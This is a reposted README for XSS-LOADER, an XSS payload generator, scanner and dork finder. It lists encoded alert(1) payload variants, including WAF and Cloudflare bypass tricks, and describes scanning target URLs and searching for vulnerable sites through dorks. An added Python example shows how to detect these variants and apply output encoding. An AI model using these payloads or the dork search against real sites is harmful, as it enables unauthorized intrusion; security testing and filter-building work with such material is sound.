
❈ XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


Written by Hulya Karabag
Instagram: Hulya Karabag


How to use

Read Me
  • This tool creates payloads for use in XSS injection
  • Select a default payload tag from the parameters or write your own payload
  • It performs XSS injection with the Xss Scanner parameter
  • It finds URLs of vulnerable sites with the Xss Dork Finder parameter


Installation with requirements.txt
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

python3 payloader.py


*Basic Payload
Sets default parameter to: <script>alert(1)</script>

*Div Payload
Sets default parameter to: <div onpointerover='alert(1)'>MOVE HERE</div>

*Img Payload
Sets default parameter to: <img src=x onerror=alert('1');>

*Body Payload
Sets default parameter to: <body ontouchstart=alert(1)>

*Svg Payload
Sets default parameter to: <svg onload=alert('1')>

*Enter Your Payload
Encodes a payload written by the user

*Payload Generator Parameter
Encodes the payload for the selected tag

* | 1. UPPER CASE-----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> &lt;script&gt;alert(1)&lt;/script&gt;
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 30. EXIT
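
Seen from the defending side, most of the encoder options above are only different wrappings of the same string. The following is an added example, not part of XSS-LOADER or its README: a filter canonicalises input before matching, so variants 1, 2, 3, 4, 6 and 12 collapse to one form, and context-aware output encoding makes the tag block breakout (16) inert. The function names and the small marker rule set are assumptions made for illustration.

```python
import base64, binascii, html, re
from urllib.parse import unquote

# Small illustrative rule set (assumed), applied only after canonicalisation.
MARKERS = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript:")

def _try_hex(s):
    # Variant 6: a pure hex string is decoded to text.
    if len(s) >= 8 and len(s) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", s):
        return bytes.fromhex(s).decode("utf-8", "replace")
    return s

def _try_base64(s):
    # Variant 12: decode only strictly valid base64 that yields UTF-8 text.
    if len(s) >= 8 and len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        try:
            return base64.b64decode(s, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            pass
    return s

def canonicalize(value, max_rounds=5):
    """Undo URL, HTML-entity, hex and base64 layers until the value is stable."""
    for _ in range(max_rounds):
        decoded = _try_base64(_try_hex(html.unescape(unquote(value))))
        if decoded == value:
            break
        value = decoded
    return value.lower()  # variants 1 and 2: case folding

def looks_like_xss(value):
    return bool(MARKERS.search(canonicalize(value)))

def render_attr(value):
    """Context-aware output encoding for a double-quoted HTML attribute."""
    return '<input value="%s">' % html.escape(value, quote=True)

# Inputs copied from the encoder list above, plus one constructed benign value.
SAMPLES = [
    "<ScRiPt>aleRt(1)</ScRiPt>",
    "%3Cscript%3Ealert%281%29%3C%2Fscript%3E",
    "&lt;script&gt;alert(1)&lt;/script&gt;",
    "3c7363726970743e616c6572742831293c2f7363726970743e",
    "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    "Tom & Jerry <3",  # constructed benign input
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(looks_like_xss(s), canonicalize(s))
    print(render_attr('"><script>alert(1)</script>'))
```

Pattern matching of this kind is a detection aid only and does not cover every option in the list (the UTF-7, UTF-16 and overlong UTF-8 forms are not decoded here); the output encoding in render_attr is what actually removes the injection point.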

*Xss Scanner
First enter the URL of the target, in the form shown in this example: e.g. target -----> http://target.com/index.php?name=
Then select the payload list to scan with:
  • BASIC PAYLOAD LIST ==> Payload list consisting of script tag
  • DIV PAYLOAD LIST ==> Payload list consisting of div tag
  • IMG PAYLOAD LIST ==> Payload list consisting of img tag
  • BODY PAYLOAD LIST ==> Payload list consisting of body tag
  • SVG PAYLOAD LIST ==> Payload list consisting of svg tag
  • MIXED PAYLOAD LIST ==> Payload list consisting of all tag
  • ENTER FILE PATH ==> Payload list determined by the user. Please enter the path like this example (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder
First enter the dork for searching: e.g. -----> inurl:"search.php?q="
Results will be saved in "dork.txt" after scanning.

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

Support and Donations
Contact us with email [email protected]
Copyright 2020


Read the full article (external source: http://feedproxy.google.com/~r/PentestTools/~3/4Q8ciQPdm90/xss-loader-xss-payload-generator-xss.html)
